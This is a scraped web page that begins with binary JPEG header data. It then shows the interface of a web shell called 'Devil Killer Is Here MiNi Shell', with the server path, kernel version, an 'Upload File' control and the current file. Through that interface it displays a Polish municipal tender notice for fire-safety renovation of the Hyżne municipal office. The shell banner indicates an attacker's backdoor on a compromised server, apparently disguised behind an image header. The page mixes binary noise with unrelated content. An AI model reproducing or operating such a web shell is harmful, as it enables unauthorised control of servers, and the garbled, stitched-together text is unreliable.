JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220707/0024459001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacji budynku Urzędu Gminy do warunków odpowiadających przepisom ppoż. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA HYŻNE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690582080</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">103</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hyżne</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-024</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 23 045 60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">17 22 950 01</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">j.groszek@hyzne.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">pzp.hyzne.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacji budynku Urzędu Gminy do warunków odpowiadających przepisom ppoż. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-82572513-fde5-11ec-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00244590</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003556/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Modernizacja budynku Urzędu Gminy do warunków odpowiadających przepisom PPOŻ</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> pzp.hyzne.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">przy użyciu systemu Platformy Zamówień Publicznych ZETOPZP: https://pzp.hyzne.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się elektronicznie przy użyciu:1) Platformy Zamówień Publicznych ZETOPZP: https://pzp.hyzne.pl/<br/>2)<br/>poczty elektronicznej: adres e-mail Zamawiającego: j.groszek@hyzne.pl2. We wszelkiej<br/>korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się<br/>nadanym przez Zamawiającego numerem sprawy: RIG5.271.6.2022.JG lub numerem ogłoszenia<br/>(TED) lub identyfikatorem postępowania wygenerowanym przez ZETOPZP: https://pzp.hyzne.pl/3.<br/>Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami: 1) w zakresie procedury<br/>udzielenia zamówienia: Joanna Groszek2) w zakresie przedmiotu zamówienia: Paweł Fudali, 4.<br/>Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie<br/>rejestrując się lub logując, w przypadku posiadania konta w Platformie Zamówień Publicznych<br/>ZETOPZP, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na<br/>stronie internetowej https://pzp.hyzne.pl/ oraz uznaje go za wiążący</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1)	Administratorem Państwa danych osobowych jest Gmina Hyżne, Hyżne 103, 36-024 Hyżne <br/>2)	Dane kontaktowe inspektora ochrony danych: e-mail: iod@hyzne.pl<br/>3)	Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu przeprowadzenia postepowania o udzielenie zamówienia publicznego na podstawie Pzp.<br/>4)	Odbiorcami Państwa danych osobowych będą wyłącznie podmioty uprawnione do uzyskania danych osobowych na podstawie przepisów prawa.<br/>5)	Państwa dane osobowe przechowywane będą w czasie określonym przepisami prawa, zgodnie z instrukcją kancelaryjną i przepisami prawa.<br/>6)	Obowiązek podania przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym określonym w przepisach Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. Konsekwencje niepodania określonych danych wynikają z Pzp.<br/>7)	W odniesieniu do Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8)	Posiadają Państwo:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Państwa dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Państwa danych osobowych*;<br/>c)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają Państwo, że przetwarzanie danych osobowych Państwa dotyczących narusza przepisy RODO;<br/>9)	Nie przysługuje Państwu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RIG5.271.6.2022.</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia stanowią roboty budowlane z zakresu: „Modernizacji budynku Urzędu Gminy do warunków odpowiadających przepisom ppoż.”.<br/><br/>1.	Planowane przedsięwzięcie polegać będzie na przebudowie części budynku Urzędu Gminy Hyżne celem dostosowania do przepisów ppoż. w ramach zadania pn.: „Modernizacja budynku Urzędu Gminy do warunków odpowiadających przepisom ppoż.”. Zakres prac obejmuje VI piętro, klatkę schodową, część I piętra oraz część parteru budynku Urzędu Gminy zlokalizowanego w Hyżnem (36-024 Hyżne 103).<br/>2.	Prace będą prowadzone w godzinach pracy Urzędu tj. pon. od 7:30-17:00, wt.- czw. 7:30-15:30, pt. 7:30-14:00. Zamawiający dopuszcza wydłużenie godzin pracy jednak nie dłużej jak o 3 godz. ze względu na pracę sprzątaczek. Zamawiający dopuszcza pracę w soboty jednak roboty dotyczyć mogą prac na klatce schodowej w zakresie układania nawierzchni z płytek. W godzinach pracy do godz. 15:00 nie należy prowadzić uciążliwych prac wpływających na pracę Urzędu, Banku czy Poczty oraz należy zapewnić ciągłą komunikację do w/w Instytucji.<br/>3.	W ramach przedmiotu zamówienia planuje się m.in. następujące roboty budowlane <br/> w budynku Urzędu Gminy:<br/>a)	Roboty remontowo-budowlane:<br/>-	demontaż boazerii znajdującej się na korytarzach i klatce schodowej,<br/>-	demontaż płytek posadzkowych i cokołów oraz parkietów i paneli w pomieszczeniach biurowych,<br/>-	demontaż istniejącej stolarki drzwiowej,<br/>-	szpachlowanie ścian korytarza i klatki schodowej,<br/>-	wykonanie warstwy wyrównawczej pod posadzkę,<br/>-	układanie płytek podłogowych i cokołów,<br/>-	tapetowanie ścian korytarza,<br/>-	malowanie pomieszczeń biurowych, korytarzy i klatki schodowej,<br/>-	montaż nadproży,<br/>-	murowanie ścian,<br/>-	tynkowanie,<br/>Rodzaj płytek podłogowych (kolor, faktura, wymiar), fug i tapeta (faktura) tożsame <br/> z zamontowanymi na II i III piętrze budynku. Inwestor dopuszcza niewielkie <br/> różnice w ww. materiałach w stosunku do materiałów użytych na III piętrze <br/>budynku. <br/>b)	Roboty instalacyjne:<br/>-	demontaż istniejących opraw oświetleniowych,<br/>-	montażem opraw oświetleniowych o strumieniu świetlnym 5 lm w pomieszczeniach biurowych i na korytarzu,<br/>-	montażem opraw oświetleniowych o strumieniu świetlnym 5 lm (kinkiety) na korytarzu,<br/>-	montaż oprawy awaryjnej z optyką asymetryczną, strumień świetlny 175 lm,<br/>-	montaż opraw awaryjnych z optyką do oświetlania korytarzy, strumień świetlny 180 lm,<br/>-	montaż opraw awaryjnych kierunkowych,<br/>-	montaż klapy oddymiającej wraz z instalacją,<br/>Rodzaje opraw oświetleniowych w tym kinkietów tożsame z zamontowanymi na II i III piętrze budynku.<br/>c)	Montaż stolarki drzwiowej (tożsamej z zamontowaną na II i III piętrze budynku):<br/>-	Demontaż istniejącej stolarki przewidzianej do wymiany wraz z utylizacją na koszt wykonawcy – część stolarki,<br/>-	montaż drzwi aluminiowych EI30S z samozamykaczem systemowym (D1), <br/>-	montaż drzwi wewnętrznych z samozamykaczem systemowym (D4), <br/>-	montaż drzwi wewnętrznych z kratką wentylacyjną z samozamykaczem systemowym (D9),<br/>-	montaż drzwi wewnętrznych z samozamykaczem systemowym (D5),<br/>-	montaż drzwi wewnętrznych EI30S z samozamykaczem systemowym (D7),<br/>-	montaż drzwi wewnętrznych z samozamykaczem systemowym (D2),<br/>-	montaż drzwi wewnętrznych EI30S z samozamykaczem systemowym (D12),<br/>-	montaż drzwi wewnętrznych EI30S z samozamykaczem systemowym (D8),<br/>-	montaż drzwi wewnętrznych EI30S z samozamykaczem systemowym (D6),<br/>-	montaż drzwi wewnętrznych EI30S z samozamykaczem systemowym (D3),<br/>-	montaż kraty rolowanej (rolety) antywłamaniowej,<br/>-	montaż drzwi zewnętrznych wejściowych do budynku,<br/>-	montaż drzwi przesuwnych (piętro IV – pomiędzy pomieszczeniami biurowymi),<br/>-	montaż ościeżnic z opaską dwustronną lub jednostronną 8 cm,<br/>-	montaż okna napowietrzającego O1,<br/>Stolarka drzwiowa musi być tożsama ze stolarką zamontowaną na II i III piętrze budynku (dot. m.in. kolorystyki, faktury, dekoracyjnych wstawek). Każde drzwi powinny być wyposażone w klamki ze stali nierdzewnej wraz z wkładkami. Szczegóły dot. drzwi przestawia rys. 107 Projektu wykonawczego branży architektoniczno-budowlanej „Zestawienie drzwi”. Wszystkie drzwi (z wyjątkiem przesuwnych) powinny zostać wyposażone obligatoryjnie w system samozamykacza (szynowy, ramieniowy, sprężynowy w zawiasach itp. – konieczność wykonania wzmocnienia w skrzydle i ościeżnicy.<br/>Mocowanie stolarki drzwiowej powinno przenosić i uwzględniać wszystkie siły działające na nią w miejscu zamontowania. Elementy muszą być odpowiednio wypoziomowane, wypionowane i dostosowane do wymogów bezpieczeństwa. Należy przewidzieć wykonanie uzupełnień fragmentów tyków, uzupełnienia wyprawy ścian.<br/>Podane wymiary są wymiarami uśrednionymi i przybliżonymi. Przed przystąpieniem do realizacji zamówienia stolarki drzwiowej należy wszystkie wymiary zweryfikować na budowie. Dodatkowo należy zweryfikować rodzaje ościeżnic (regulowana, stała, jednostronna lub dwustronna opaska) dla każdych drzwi.<br/>Rodzaj i sposób montażu drzwi przesuwnych (nie uwzględnionych w „Zestawieniu drzwi”) należy przedstawić do akceptacji Zamawiającemu przed przystąpieniem do realizacji.<br/>4.	Oferent przeprowadzi wizje lokalną budynku Urzędu Gminy w celu zapoznania się <br/>z zamontowanymi materiałami na II i III piętrze budynku oraz pozostałym zakresem prac.<br/>5.	Wszystkie materiały wykończeniowe należy uzgodnić z Inwestorem przed ich zamontowaniem. <br/>6.	Wszystkie materiały wbudowywane powinny być fabrycznie nowe.<br/>7.	Przedmiotowy zakres robót zawierać powinien wszelkie koszty wykonania zadania łącznie z przygotowaniem i zabezpieczeniem placu zgodnie z przepisami BHP, koszty montażu rusztowań, zabezpieczeń itp. oraz uporządkowaniem terenu po zakończeniu robót. <br/>8.	Po stronie Wykonawcy jest zagospodarowanie odpadów powstałych podczas wszystkich prac remontowych.<br/>9.	Termin realizacji zadania: od dnia zawarcia umowy do 30.09.2022 r. (ze względów organizacyjnych, Zamawiający nie dopuszcza innego terminu wykonywania prac). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45223210-1 - Roboty konstrukcyjne z wykorzystaniem stali</p> <p class="mb-0">45223100-7 - Montaż konstrukcji metalowych</p> <p class="mb-0">45262522-6 - Roboty murarskie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45324000-4 - Roboty w zakresie okładziny tynkowej</p> <p class="mb-0">45440000-3 - Roboty malarskie i szklarskie</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">50 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">O wyborze najkorzystniejszej oferty decydować będą kryteria: 1.(P1) - cena ofertowa (brutto) - 60%<br/>2. ( P2) – Gwarancja – 40 %<br/>Kryterium gwarancja oceniane będzie następująco:<br/>Minimalny okres gwarancji wynosi 60 miesięcy od daty odbioru przedmiotu umowy, maksymalny punktowany okres gwarancji 84<br/>miesiące.<br/>Zaoferowanie gwarancji na okres krótszy niż 60 m-cy skutkowało będzie odrzuceniem oferty.<br/>Oferta, w której zadeklarowany zostanie okres gwarancji w liczbie 60 miesięcy otrzyma 0 pkt.<br/>Oferta, w której zadeklarowany zostanie okres gwarancji w liczbie 84 miesiące i więcej otrzyma 40 pkt. Oferta, w której<br/>zadeklarowany zostanie okres gwarancji w liczbie od 61 do 83 miesięcy, otrzyma punkty obliczone wg następującego wzoru:<br/>G b – Rmin.<br/>P2 = --------------------- x 100 x 40%<br/>G max. – Rmin.<br/>gdzie:<br/>P2 – ilość punktów w ramach kryterium „gwarancja ”<br/>Gb – okres gwarancji oferty badanej<br/>Gmin. – minimalny okres gwarancji (60 miesięcy)<br/>Gmax. – maksymalny okres gwarancji (84 miesiące)<br/>100-wskaznik stały<br/>40 % – znaczenie kryterium okresu gwarancji<br/>Punkty w kryterium gwarancja zostaną przyznane tylko w przypadku złożenia przez Wykonawcę oświadczenia o oferowanym<br/>okresie gwarancji (w druku OFERTA). W przypadku nie złożenia takiego oświadczenia oferta otrzyma 0 punktów oraz Zamawiający<br/>uzna że Wykonawca zaoferował minimalny okres gwarancji tj. 60 m-cy.<br/>Ilość punktów przyznanych badanej ofercie P to suma punktów z kryterium cena ofertowa P1(maksymalnie 60 pkt ) i kryterium<br/>gwarancji P2 (maksymalnie 40 pkt) P=P1+P2<br/>Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów (maksymalnie 100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu.<br/>Obliczenie będzie dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> a)	Wykonawca spełni warunek jeżeli wykaże że, nie wcześniej niż w okresie ostatnich 5 lat licząc wstecz od dnia w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej:<br/><br/>– co najmniej 1 robotę budowlaną, której przedmiotem była modernizacja lub remont lub budowa/ przebudowa budynku użyteczności publicznej * o wartości minimum 100 000,00 zł brutto (słownie: sto tysięcy złotych brutto);<br/>UWAGA I: Za robotę budowlaną odpowiadającą swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia należy rozumieć robotę budowlaną zrealizowaną w ramach jednej umowy, o wartości minimum 100.000,00 zł brutto.<br/>UWAGA II: Nie dopuszcza się sumowania wartości robót budowlanych zrealizowanych w ramach kilku umów w celu uzyskania progu wartościowego wyznaczonego przez Zamawiającego<br/><br/>* budynek użyteczności publicznej należy rozumieć zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (tekst jedn. Dz.U.2022.1225 z dnia 2022.06.09)<br/><br/>Przez roboty budowlane wykonane należy rozumieć:<br/>1)	roboty budowlane rozpoczęte i zakończone w w/w okresie<br/>2)	roboty budowlane zakończone w w/w okresie, których rozpoczęcie mogło nastąpić wcześniej niż w w/w okresie.<br/><br/>b)	Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponował następującymi osobami do realizacji zamówienia posiadającymi uprawnienia budowlane* :<br/> <br/>1 osobą, która będzie uczestniczyć w wykonaniu zamówienia w charakterze kierownika budowy/robót, w specjalności konstrukcyjno – budowlanej 